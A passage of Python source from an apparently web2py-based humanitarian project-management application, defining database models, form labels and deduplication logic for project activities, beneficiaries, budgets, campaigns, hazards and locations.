msg_record_deleted = T("Activity Type removed from Activity"),
msg_list_empty = T("No Activity Types found for this Activity")
)
# Activity Organization
add_component("project_activity_organisation",
project_activity="activity_id")
# Pass names back to global scope (s3.*)
return dict(project_activity_id = activity_id,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_activity_id = lambda **attr: dummy("activity_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_activity_represent(id, row=None):
"""
Show activities with a prefix of the project code
"""
if row:
activity = row
db = current.db
# Fetch the project record
ptable = db.project_project
project = db(ptable.id == row.project_id).select(ptable.code,
limitby=(0, 1)).first()
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.project_activity
ptable = db.project_project
left = ptable.on(ptable.id == table.project_id)
row = db(table.id == id).select(table.name,
table.project_id,
ptable.code,
left=left,
limitby=(0, 1)).first()
try:
project = row[ptable]
activity = row[table]
except:
return current.messages.UNKNOWN_OPT
if project and project.code:
return "%s > %s" % (project.code, activity.name)
else:
return activity.name
# -------------------------------------------------------------------------
@staticmethod
def project_activity_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_activity":
return
data = item.data
if "project_id" in data and \
"name" in data:
# Match activity by project_id and name
project_id = data.project_id
name = data.name
table = item.table
query = (table.project_id == project_id) & \
(table.name == name)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectActivityTypeModel(S3Model):
"""
Project Activity Type Model
This model holds the Activity Types for Projects
- it is useful where we don't have the details on the actual Activities,
but just this summary of Types
"""
names = ["project_activity_type",
"project_activity_type_location",
"project_activity_type_project",
"project_activity_type_sector",
"project_activity_type_id",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Activity Types
#
tablename = "project_activity_type"
table = define_table(tablename,
Field("name", length=128,
notnull=True, unique=True),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_ACTIVITY_TYPE = T("Add Activity Type")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY_TYPE,
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search for Activity Type"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = ADD_ACTIVITY_TYPE,
msg_record_created = T("Activity Type Added"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type Deleted"),
msg_list_empty = T("No Activity Types Found")
)
# Reusable Fields
represent = S3Represent(lookup=tablename, translate=True)
activity_type_id = S3ReusableField("activity_type_id", table,
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity_type.id",
represent,
sort=True)),
represent = represent,
label = T("Activity Type"),
comment = S3AddResourceLink(title=ADD_ACTIVITY_TYPE,
c="project",
f="activity_type",
tooltip=T("If you don't see the type in the list, you can add a new one by clicking link 'Add Activity Type'.")),
ondelete = "SET NULL")
# Component (for Custom Form)
self.add_component("project_activity_type_sector",
project_activity_type="activity_type_id")
crud_form = S3SQLCustomForm(
"name",
# Sectors
S3SQLInlineComponent(
"activity_type_sector",
label=T("Sectors to which this Activity Type can apply"),
fields=["sector_id"],
),
)
self.configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "activity_type_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Activity Type - Sector Link Table
#
tablename = "project_activity_type_sector"
table = define_table(tablename,
activity_type_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Activity Type - Project Location Link Table
#
tablename = "project_activity_type_location"
table = define_table(tablename,
activity_type_id(empty=False),
self.project_location_id(empty=False),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Activity Type - Project Link Table
#
tablename = "project_activity_type_project"
table = define_table(tablename,
activity_type_id(empty=False),
self.project_project_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Project Location"),
msg_record_created = T("Activity Type added to Project Location"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type removed from Project Location"),
msg_list_empty = T("No Activity Types found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict(project_activity_type_id = activity_type_id,
)
# =============================================================================
class S3ProjectActivityOrganisationModel(S3Model):
"""
Project Activity Organisation Model
This model holds the Activity Organisations for Projects
- it is useful where we don't have the details on the actual Activities,
but just this summary of Organisations
"""
names = ["project_activity_organisation",
"project_activity_group",
]
def model(self):
T = current.T
define_table = self.define_table
project_activity_id = self.project_activity_id
# ---------------------------------------------------------------------
# Activities <> Organisations - Link table
#
tablename = "project_activity_organisation"
table = define_table(tablename,
project_activity_id(empty=False),
self.org_organisation_id(empty=False),
*s3_meta_fields())
# CRUD Strings
ADD_ACTIVITY_ORG = T("Add Activity Organisation")
current.response.s3.crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY_ORG,
title_display = T("Activity Organisation"),
title_list = T("Activity Organisations"),
title_update = T("Edit Activity Organisation"),
title_search = T("Search for Activity Organisation"),
subtitle_create = T("Add New Activity Organisation"),
label_list_button = T("List Activity Organisations"),
label_create_button = ADD_ACTIVITY_ORG,
msg_record_created = T("Activity Organisation Added"),
msg_record_modified = T("Activity Organisation Updated"),
msg_record_deleted = T("Activity Organisation Deleted"),
msg_list_empty = T("No Activity Organisations Found")
)
# ---------------------------------------------------------------------
# Activities <> Organisation Groups - Link table
#
tablename = "project_activity_group"
table = define_table(tablename,
project_activity_id(empty=False),
self.org_group_id(empty=False),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectAnnualBudgetModel(S3Model):
"""
Project Budget Model
This model holds the annual budget entries for projects
"""
names = ["project_annual_budget"]
def model(self):
T = current.T
db = current.db
# ---------------------------------------------------------------------
# Annual Budgets
#
tablename = "project_annual_budget"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("year", "integer", notnull=True,
                                default=None, # @ToDo: default to the current year
requires=IS_INT_IN_RANGE(1950, 3000),
label=T("Year"),
),
Field("amount", "double", notnull=True,
default=0.00,
requires=IS_FLOAT_AMOUNT(),
label=T("Amount"),
),
s3_currency(required=True),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Annual Budget"),
title_display = T("Annual Budget"),
title_list = T("Annual Budgets"),
title_update = T("Edit Annual Budget"),
title_search = T("Search Annual Budgets"),
title_upload = T("Import Annual Budget data"),
title_report = T("Report on Annual Budgets"),
subtitle_create = T("Add New Annual Budget"),
label_list_button = T("List Annual Budgets"),
label_create_button = T("New Annual Budget"),
msg_record_created = T("New Annual Budget created"),
msg_record_modified = T("Annual Budget updated"),
msg_record_deleted = T("Annual Budget deleted"),
msg_list_empty = T("No annual budgets found")
)
self.configure(tablename,
list_fields=["id",
"year",
"amount",
"currency",
]
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectBeneficiaryModel(S3Model):
"""
Project Beneficiary Model
- depends on Stats module
"""
names = ["project_beneficiary_type",
"project_beneficiary",
]
def model(self):
if not current.deployment_settings.has_module("stats"):
            # The Beneficiary Model requires the Stats module to be enabled
return dict()
T = current.T
db = current.db
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Project Beneficiary Type
#
tablename = "project_beneficiary_type"
table = define_table(tablename,
super_link("parameter_id", "stats_parameter"),
Field("name", length=128, unique=True,
requires = IS_NOT_IN_DB(db,
"project_beneficiary_type.name")),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_BNF_TYPE = T("Add Beneficiary Type")
crud_strings[tablename] = Storage(
title_create = ADD_BNF_TYPE,
title_display = T("Beneficiary Type"),
title_list = T("Beneficiary Types"),
title_update = T("Edit Beneficiary Type"),
title_search = T("Search Beneficiary Types"),
subtitle_create = T("Add New Beneficiary Type"),
label_list_button = T("List Beneficiary Types"),
label_create_button = ADD_BNF_TYPE,
msg_record_created = T("Beneficiary Type Added"),
msg_record_modified = T("Beneficiary Type Updated"),
msg_record_deleted = T("Beneficiary Type Deleted"),
msg_list_empty = T("No Beneficiary Types Found")
)
# Resource Configuration
configure(tablename,
super_entity = "stats_parameter",
)
# ---------------------------------------------------------------------
# Project Beneficiary
#
# @ToDo: Split project_id & project_location_id to separate Link Tables
#
tablename = "project_beneficiary"
table = define_table(tablename,
# Link Fields
# populated automatically
self.project_project_id(readable=False,
writable=False),
self.project_location_id(comment=None),
# Instance
super_link("data_id", "stats_data"),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Beneficiary Type"),
instance_types = ["project_beneficiary_type"],
represent = S3Represent(lookup="stats_parameter",
translate=True,
),
readable = True,
writable = True,
empty = False,
comment = S3AddResourceLink(c="project",
f="beneficiary_type",
vars = dict(child = "parameter_id"),
title=ADD_BNF_TYPE,
tooltip=T("Please record Beneficiary according to the reporting needs of your project")),
),
# Populated automatically from project_location
self.gis_location_id(readable = False,
writable = False),
Field("value", "integer",
label = T("Quantity"),
requires = IS_INT_IN_RANGE(0, 99999999),
represent = lambda v: \
IS_INT_AMOUNT.represent(v)
),
s3_date("date",
label = T("Start Date"),
#empty = False,
),
s3_date("end_date",
label = T("End Date"),
#empty = False,
),
#self.stats_source_id(),
s3_comments(),
*s3_meta_fields())
# Virtual fields
table.year = Field.Lazy(self.project_beneficiary_year)
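        # "year" is a lazy virtual field, computed per row on access by
        # project_beneficiary_year() below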
# CRUD Strings
ADD_BNF = T("Add Beneficiaries")
crud_strings[tablename] = Storage(
title_create = ADD_BNF,
title_display = T("Beneficiaries Details"),
title_list = T("Beneficiaries"),
title_update = T("Edit Beneficiaries"),
title_search = T("Search Beneficiaries"),
title_report = T("Beneficiary Report"),
subtitle_create = T("Add New Beneficiaries"),
label_list_button = T("List Beneficiaries"),
label_create_button = ADD_BNF,
msg_record_created = T("Beneficiaries Added"),
msg_record_modified = T("Beneficiaries Updated"),
msg_record_deleted = T("Beneficiaries Deleted"),
msg_list_empty = T("No Beneficiaries Found")
)
# Resource Configuration
report_fields = ["project_location_id",
(T("Beneficiary Type"), "parameter_id"),
"project_id",
(T("Year"), "year"),
"project_id$hazard.name",
"project_id$theme.name",
(current.messages.COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
]
# ---------------------------------------------------------------------
def year_options():
"""
returns a dict of the options for the year virtual field
used by the search widget
orderby needed for postgres
"""
ptable = db.project_project
pbtable = db.project_beneficiary
pquery = (ptable.deleted == False)
pbquery = (pbtable.deleted == False)
pmin = ptable.start_date.min()
pbmin = pbtable.date.min()
p_start_date_min = db(pquery).select(pmin,
orderby=pmin,
limitby=(0, 1)).first()[pmin]
pb_date_min = db(pbquery).select(pbmin,
orderby=pbmin,
limitby=(0, 1)).first()[pbmin]
if p_start_date_min and pb_date_min:
start_year = min(p_start_date_min,
pb_date_min).year
else:
start_year = (p_start_date_min and p_start_date_min.year) or \
(pb_date_min and pb_date_min.year)
pmax = ptable.end_date.max()
pbmax = pbtable.end_date.max()
p_end_date_max = db(pquery).select(pmax,
orderby=pmax,
limitby=(0, 1)).first()[pmax]
pb_end_date_max = db(pbquery).select(pbmax,
orderby=pbmax,
limitby=(0, 1)).first()[pbmax]
if p_end_date_max and pb_end_date_max:
end_year = max(p_end_date_max,
pb_end_date_max).year
else:
end_year = (p_end_date_max and p_end_date_max.year) or \
(pb_end_date_max and pb_end_date_max.year)
            if not start_year or not end_year:
                # Only one of the bounds is available
                year = start_year or end_year
                return {year: year}
years = {}
for year in xrange(start_year, end_year + 1):
years[year] = year
return years
configure(tablename,
super_entity = "stats_data",
onaccept=self.project_beneficiary_onaccept,
deduplicate=self.project_beneficiary_deduplicate,
report_options=Storage(
search=[
S3SearchOptionsWidget(
field="project_id",
name="project",
label=T("Project")
),
S3SearchOptionsWidget(
field="parameter_id",
name="parameter_id",
label=T("Beneficiary Type")
),
                          # @ToDo: These do not work - no results are returned
S3SearchOptionsWidget(
field="year",
name="year",
label=T("Year"),
options = year_options
),
S3SearchOptionsWidget(
name = "beneficiary_search_L1",
field = "location_id$L1",
location_level = "L1",
cols = 3,
),
],
rows=report_fields,
cols=report_fields,
fact=["value"],
methods=["sum"],
defaults=Storage(rows="beneficiary.project_id",
cols="beneficiary.parameter_id",
fact="beneficiary.value",
aggregate="sum",
totals=True
)
),
extra_fields = ["project_id", "date", "end_date"]
)
# Reusable Field
beneficiary_id = S3ReusableField("beneficiary_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_beneficiary.id",
self.project_beneficiary_represent,
sort=True)),
represent = self.project_beneficiary_represent,
label = T("Beneficiaries"),
comment = S3AddResourceLink(c="project",
f="beneficiary",
title=ADD_BNF,
tooltip=\
T("If you don't see the beneficiary in the list, you can add a new one by clicking link 'Add Beneficiary'.")),
ondelete = "SET NULL")
# ---------------------------------------------------------------------
# Beneficiary <> Activity Link Table
#
tablename = "project_beneficiary_activity"
table = define_table(tablename,
self.project_activity_id(),
beneficiary_id(),
#s3_comments(),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_beneficiary_represent(id, row=None):
"""
FK representation
@ToDo: Bulk
"""
if row:
return row.type
if not id:
return current.messages["NONE"]
db = current.db
table = db.project_beneficiary
ttable = db.project_beneficiary_type
query = (table.id == id) & \
(table.parameter_id == ttable.id)
r = db(query).select(table.value,
ttable.name,
limitby = (0, 1)).first()
try:
return "%s %s" % (r["project_beneficiary.value"],
r["project_beneficiary_type.name"])
except:
return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_onaccept(form):
"""
Update project_beneficiary project & location from project_location_id
"""
db = current.db
btable = db.project_beneficiary
ltable = db.project_location
record_id = form.vars.id
query = (btable.id == record_id) & \
(ltable.id == btable.project_location_id)
project_location = db(query).select(ltable.project_id,
ltable.location_id,
limitby=(0, 1)).first()
if project_location:
db(btable.id == record_id).update(
project_id = project_location.project_id,
location_id = project_location.location_id
)
return
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_beneficiary":
return
data = item.data
if "parameter_id" in data and \
"project_location_id" in data:
# Match beneficiary by type and project_location
table = item.table
parameter_id = data.parameter_id
project_location_id = data.project_location_id
query = (table.parameter_id == parameter_id) & \
(table.project_location_id == project_location_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_year(row):
""" Virtual field for the project_beneficiary table """
if hasattr(row, "project_beneficiary"):
row = row.project_beneficiary
try:
project_id = row.project_id
except AttributeError:
return []
try:
date = row.date
except AttributeError:
date = None
try:
end_date = row.end_date
except AttributeError:
end_date = None
if not date or not end_date:
table = current.s3db.project_project
project = current.db(table.id == project_id) \
.select(table.start_date,
table.end_date,
limitby=(0, 1)).first()
if project:
if not date:
date = project.start_date
if not end_date:
end_date = project.end_date
if not date and not end_date:
return []
elif not end_date:
return [date.year]
elif not date:
return [end_date.year]
else:
return list(xrange(date.year, end_date.year + 1))
# =============================================================================
class S3ProjectCampaignModel(S3Model):
"""
Project Campaign Model
- used for TERA integration:
http://www.ifrc.org/en/what-we-do/beneficiary-communications/tera/
- depends on Stats module
"""
names = ["project_campaign",
"project_campaign_message",
"project_campaign_keyword",
#"project_campaign_response",
"project_campaign_response_summary",
]
def model(self):
if not current.deployment_settings.has_module("stats"):
            # The Campaigns Model requires the Stats module to be enabled
return dict()
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
location_id = self.gis_location_id
# ---------------------------------------------------------------------
# Project Campaign
#
tablename = "project_campaign"
table = define_table(tablename,
#self.project_project_id(),
Field("name", length=128, #unique=True,
#requires = IS_NOT_IN_DB(db,
# "project_campaign.name")
),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN = T("Add Campaign")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN,
title_display = T("Campaign"),
title_list = T("Campaigns"),
title_update = T("Edit Campaign"),
title_search = T("Search Campaigns"),
subtitle_create = T("Add New Campaign"),
label_list_button = T("List Campaigns"),
label_create_button = ADD_CAMPAIGN,
msg_record_created = T("Campaign Added"),
msg_record_modified = T("Campaign Updated"),
msg_record_deleted = T("Campaign Deleted"),
msg_list_empty = T("No Campaigns Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename)
campaign_id = S3ReusableField("campaign_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_campaign.id",
represent,
sort=True)),
represent = represent,
label = T("Campaign"),
comment = S3AddResourceLink(c="project",
f="campaign",
title=ADD_CAMPAIGN,
tooltip=\
T("If you don't see the campaign in the list, you can add a new one by clicking link 'Add Campaign'.")),
ondelete = "CASCADE")
add_component("project_campaign_message",
project_campaign="campaign_id")
# ---------------------------------------------------------------------
# Project Campaign Message
# - a Message to broadcast to a geographic location (Polygon)
#
tablename = "project_campaign_message"
table = define_table(tablename,
campaign_id(),
Field("name", length=128, #unique=True,
#requires = IS_NOT_IN_DB(db,
# "project_campaign.name")
),
s3_comments("message",
label = T("Message")),
location_id(
widget = S3LocationSelectorWidget(
catalog_layers=True,
polygon=True
)
),
# @ToDo: Allow selection of which channel message should be sent out on
#self.msg_channel_id(),
# @ToDo: Record the Message sent out
#self.msg_message_id(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
        ADD_CAMPAIGN_MESSAGE = T("Add Campaign Message")
        crud_strings[tablename] = Storage(
            title_create = ADD_CAMPAIGN_MESSAGE,
            title_display = T("Campaign Message"),
            title_list = T("Campaign Messages"),
            title_update = T("Edit Campaign Message"),
            title_search = T("Search Campaign Messages"),
            subtitle_create = T("Add New Campaign Message"),
            label_list_button = T("List Campaign Messages"),
            label_create_button = ADD_CAMPAIGN_MESSAGE,
            msg_record_created = T("Campaign Message Added"),
            msg_record_modified = T("Campaign Message Updated"),
            msg_record_deleted = T("Campaign Message Deleted"),
            msg_list_empty = T("No Campaign Messages Found")
        )
# Reusable Field
represent = S3Represent(lookup=tablename)
message_id = S3ReusableField("campaign_message_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_campaign_message.id",
represent,
sort=True)),
represent = represent,
label = T("Campaign Message"),
ondelete = "CASCADE")
#add_component("project_campaign_response",
# project_campaign_message="campaign_message_id")
add_component("project_campaign_response_summary",
project_campaign_message="campaign_message_id")
# ---------------------------------------------------------------------
# Project Campaign Keyword
# - keywords in responses which are used in Stats reporting
#
tablename = "project_campaign_keyword"
table = define_table(tablename,
super_link("parameter_id", "stats_parameter"),
Field("name", length=128, unique=True,
requires = IS_NOT_IN_DB(db,
"project_campaign_keyword.name")),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN_KW = T("Add Keyword")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN_KW,
title_display = T("Keyword"),
title_list = T("Keywords"),
title_update = T("Edit Keyword"),
title_search = T("Search Keywords"),
subtitle_create = T("Add New Keyword"),
label_list_button = T("List Keywords"),
label_create_button = ADD_CAMPAIGN_KW,
msg_record_created = T("Keyword Added"),
msg_record_modified = T("Keyword Updated"),
msg_record_deleted = T("Keyword Deleted"),
msg_list_empty = T("No Keywords Found")
)
# Resource Configuration
configure(tablename,
super_entity = "stats_parameter",
)
# ---------------------------------------------------------------------
# Project Campaign Response
# - individual response (unused for TERA)
# - this can be populated by parsing raw responses
# - these are aggregated into project_campaign_response_summary
#
#tablename = "project_campaign_response"
#table = define_table(tablename,
# message_id(),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
# super_link("parameter_id", "stats_parameter",
# label = T("Keyword"),
# instance_types = ["project_campaign_keyword"],
# represent = S3Represent(lookup="stats_parameter"),
# readable = True,
# writable = True,
# empty = False,
# ),
# Getting this without TERA may be hard!
#location_id(writable = False),
# @ToDo: Link to the raw Message received
#self.msg_message_id(),
# s3_datetime(),
# s3_comments(),
# *s3_meta_fields())
# CRUD Strings
#ADD_CAMPAIGN_RESP = T("Add Response")
#crud_strings[tablename] = Storage(
# title_create = ADD_CAMPAIGN_RESP,
# title_display = T("Response Details"),
# title_list = T("Responses"),
# title_update = T("Edit Response"),
# title_search = T("Search Responses"),
# title_report = T("Response Report"),
# subtitle_create = T("Add New Response"),
# label_list_button = T("List Responses"),
# label_create_button = ADD_CAMPAIGN_RESP,
# msg_record_created = T("Response Added"),
# msg_record_modified = T("Response Updated"),
# msg_record_deleted = T("Response Deleted"),
# msg_list_empty = T("No Responses Found")
#)
# ---------------------------------------------------------------------
# Project Campaign Response Summary
# - aggregated responses (by Keyword/Location)
# - TERA data comes in here
#
tablename = "project_campaign_response_summary"
table = define_table(tablename,
message_id(),
# Instance
super_link("data_id", "stats_data"),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Keyword"),
instance_types = ["project_campaign_keyword"],
represent = S3Represent(lookup="stats_parameter"),
readable = True,
writable = True,
empty = False,
),
# Populated automatically (by TERA)
# & will be a msg_basestation?
location_id(writable = False),
Field("value", "integer",
label = T("Number of Responses"),
requires = IS_INT_IN_RANGE(0, 99999999),
represent = lambda v: \
IS_INT_AMOUNT.represent(v)),
# @ToDo: Populate automatically from time Message is sent?
s3_date("date",
label = T("Start Date"),
#empty = False,
),
s3_date("end_date",
label = T("End Date"),
#empty = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN_RESP_SUMM = T("Add Response Summary")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN_RESP_SUMM,
title_display = T("Response Summary Details"),
title_list = T("Response Summaries"),
title_update = T("Edit Response Summary"),
title_search = T("Search Response Summaries"),
title_report = T("Response Summary Report"),
subtitle_create = T("Add New Response Summary"),
label_list_button = T("List Response Summaries"),
label_create_button = ADD_CAMPAIGN_RESP_SUMM,
msg_record_created = T("Response Summary Added"),
msg_record_modified = T("Response Summary Updated"),
msg_record_deleted = T("Response Summary Deleted"),
msg_list_empty = T("No Response Summaries Found")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectFrameworkModel(S3Model):
"""
Project Framework Model
"""
names = ["project_framework",
"project_framework_organisation",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
messages = current.messages
ORGANISATION = messages.ORGANISATION
ORGANISATIONS = T("Organization(s)")
# ---------------------------------------------------------------------
# Project Frameworks
#
tablename = "project_framework"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
Field("name",
length=255,
unique=True,
label = T("Name"),
),
s3_comments("description",
label = T("Description"),
comment=None,
),
Field("time_frame",
represent = lambda v: v or messages.NONE,
label = T("Time Frame"),
),
*s3_meta_fields())
# CRUD Strings
if current.deployment_settings.get_auth_record_approval():
msg_record_created = T("Policy or Strategy added, awaiting administrator's approval")
else:
msg_record_created = T("Policy or Strategy added")
crud_strings[tablename] = Storage(
title_create = T("Add Policy or Strategy"),
title_display = T("Policy or Strategy"),
title_list = T("Policies & Strategies"),
title_update = T("Edit Policy or Strategy"),
title_search = T("Search Policies & Strategies"),
title_upload = T("Import Policies & Strategies"),
subtitle_create = T("Add New Policy or Strategy"),
label_list_button = T("List Policies & Strategies"),
label_create_button = T("Add Policy or Strategy"),
msg_record_created = msg_record_created,
msg_record_modified = T("Policy or Strategy updated"),
msg_record_deleted = T("Policy or Strategy deleted"),
msg_list_empty = T("No Policies or Strategies found")
)
crud_form = S3SQLCustomForm(
"name",
S3SQLInlineComponent(
"framework_organisation",
label = ORGANISATIONS,
fields = ["organisation_id"],
),
"description",
"time_frame",
S3SQLInlineComponent(
"document",
label = T("Files"),
fields = ["file"],
filterby = dict(field = "file",
options = "",
invert = True,
)
),
)
# search_method = S3Search(simple = S3SearchSimpleWidget(
# name = "project_framework_search_text",
# label = T("Name"),
# comment = T("Search for a Policy or Strategy by name or description."),
# field = ["name",
# "description",
# ]
# ))
self.configure(tablename,
super_entity="doc_entity",
crud_form = crud_form,
#search_method = search_method,
list_fields = ["name",
(ORGANISATIONS, "framework_organisation.organisation_id"),
"description",
"time_frame",
(T("Files"), "document.file"),
]
)
represent = S3Represent(lookup=tablename)
framework_id = S3ReusableField("framework_id", table,
                                       label = T("Policy or Strategy"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_framework.id",
represent
)),
represent = represent,
ondelete = "CASCADE",
)
self.add_component("project_framework_organisation",
project_framework="framework_id")
# ---------------------------------------------------------------------
# Project Framework Organisations
#
tablename = "project_framework_organisation"
define_table(tablename,
framework_id(),
self.org_organisation_id(),
*s3_meta_fields()
)
# CRUD Strings
crud_strings[tablename] = Storage(
title_create = T("New Organization"),
title_display = ORGANISATION,
title_list = T("Organizations"),
title_update = T("Edit Organization"),
title_search = T("Search Organizations"),
subtitle_create = T("Add New Organization"),
label_list_button = T("List Organizations"),
label_create_button = T("Add Organization"),
msg_record_created = T("Organization added to Policy/Strategy"),
msg_record_modified = T("Organization updated"),
msg_record_deleted = T("Organization removed from Policy/Strategy"),
msg_list_empty = T("No Organizations found for this Policy/Strategy")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectHazardModel(S3Model):
"""
Project Hazard Model
"""
names = ["project_hazard",
"project_hazard_project",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Hazard
#
tablename = "project_hazard"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_HAZARD = T("Add Hazard")
crud_strings[tablename] = Storage(
title_create = ADD_HAZARD,
title_display = T("Hazard Details"),
title_list = T("Hazards"),
title_update = T("Edit Hazard"),
title_upload = T("Import Hazards"),
subtitle_create = T("Add New Hazard"),
label_list_button = T("List Hazards"),
label_create_button = ADD_HAZARD,
label_delete_button = T("Delete Hazard"),
msg_record_created = T("Hazard added"),
msg_record_modified = T("Hazard updated"),
msg_record_deleted = T("Hazard deleted"),
msg_list_empty = T("No Hazards currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
hazard_id = S3ReusableField("hazard_id", table,
sortby = "name",
label = T("Hazards"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_hazard.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE",
)
        # Field settings for the project_project.hazard field used in the
        # friendly_string_from_field_query function
        # - setting them here breaks Action Buttons, so they are set inside
        #   the function which calls them
#table.id.represent = represent
#table.id.label = T("Hazard")
# ---------------------------------------------------------------------
# Projects <> Hazards Link Table
#
tablename = "project_hazard_project"
define_table(tablename,
hazard_id(),
self.project_project_id(),
*s3_meta_fields()
)
# CRUD Strings
crud_strings[tablename] = Storage(
title_create = T("New Hazard"),
title_display = T("Hazard"),
title_list = T("Hazards"),
title_update = T("Edit Hazard"),
title_search = T("Search Hazards"),
title_upload = T("Import Hazard data"),
subtitle_create = T("Add New Hazard"),
label_list_button = T("List Hazards"),
label_create_button = T("Add Hazard to Project"),
msg_record_created = T("Hazard added to Project"),
msg_record_modified = T("Hazard updated"),
msg_record_deleted = T("Hazard removed from Project"),
msg_list_empty = T("No Hazards found for this Project"))
self.configure(tablename,
deduplicate=self.project_hazard_project_deduplicate,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_hazard_project":
return
data = item.data
if "project_id" in data and \
"hazard_id" in data:
project_id = data.project_id
hazard_id = data.hazard_id
table = item.table
query = (table.project_id == project_id) & \
(table.hazard_id == hazard_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectLocationModel(S3Model):
"""
Project Location Model
- these can simply be ways to display a Project on the Map
or these can be 'Communities'
"""
names = ["project_location",
"project_location_id",
"project_location_contact",
"project_location_represent",
]
def model(self):
T = current.T
db = current.db
settings = current.deployment_settings
community = settings.get_project_community()
messages = current.messages
NONE = messages["NONE"]
COUNTRY = messages.COUNTRY
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Project Location ('Community')
#
tablename = "project_location"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
# Populated onaccept - used for map popups
Field("name",
writable=False),
self.project_project_id(),
self.gis_location_id(
widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION(),
represent = self.gis_LocationRepresent(sep=", "),
comment = S3AddResourceLink(c="gis",
f="location",
